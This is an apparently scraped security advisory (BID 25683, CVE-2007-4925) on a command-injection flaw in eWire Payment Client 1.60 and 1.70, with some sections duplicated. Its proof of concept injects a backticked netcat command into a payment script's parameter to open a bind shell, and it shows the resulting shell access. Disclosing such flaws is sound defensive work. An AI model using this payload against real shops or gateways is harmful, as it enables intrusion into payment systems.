ewire Payment Client Command Execution Vulnerability
BID:25683
Info
ewire Payment Client Command Execution Vulnerability
| Bugtraq ID: | 25683 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-4925 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 17 2007 12:00AM |
| Updated: | May 07 2015 05:35PM |
| Credit: | An anonymous researcher is credited with discovering this issue. |
| Vulnerable: |
eWire Payment Client 1.70 eWire Payment Client 1.60 |
| Not Vulnerable: | |
Discussion
ewire Payment Client Command Execution Vulnerability
ewire Payment Client is prone to a vulnerability that allows attackers to execute arbitrary shell commands because the software fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary shell commands on an affected computer with the privileges of the application using the affected class utility.
ewire Payment Client 1.60 and 1.70 are vulnerable to this issue.
ewire Payment Client is prone to a vulnerability that allows attackers to execute arbitrary shell commands because the software fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary shell commands on an affected computer with the privileges of the application using the affected class utility.
ewire Payment Client 1.60 and 1.70 are vulnerable to this issue.
Exploit / POC
ewire Payment Client Command Execution Vulnerability
The following proof of concept will open a listening Bash shell on TCP Port 6666 of a vulnerable shop or payment gateway.
GET
http://www.example.com/simplePHPLinux/3payment_receive.php?paymentin
fo=`/bin/nc -l -p6666 -e /bin/bash`
$ telnet www.example.com 6666
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
The following proof of concept will open a listening Bash shell on TCP Port 6666 of a vulnerable shop or payment gateway.
GET
http://www.example.com/simplePHPLinux/3payment_receive.php?paymentin
fo=`/bin/nc -l -p6666 -e /bin/bash`
$ telnet www.example.com 6666
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Solution / Fix
ewire Payment Client Command Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
ewire Payment Client Command Execution Vulnerability
References:
References:
- ewire Homepage (ewire)
- ewire PHP component remote code execution (FortConsult)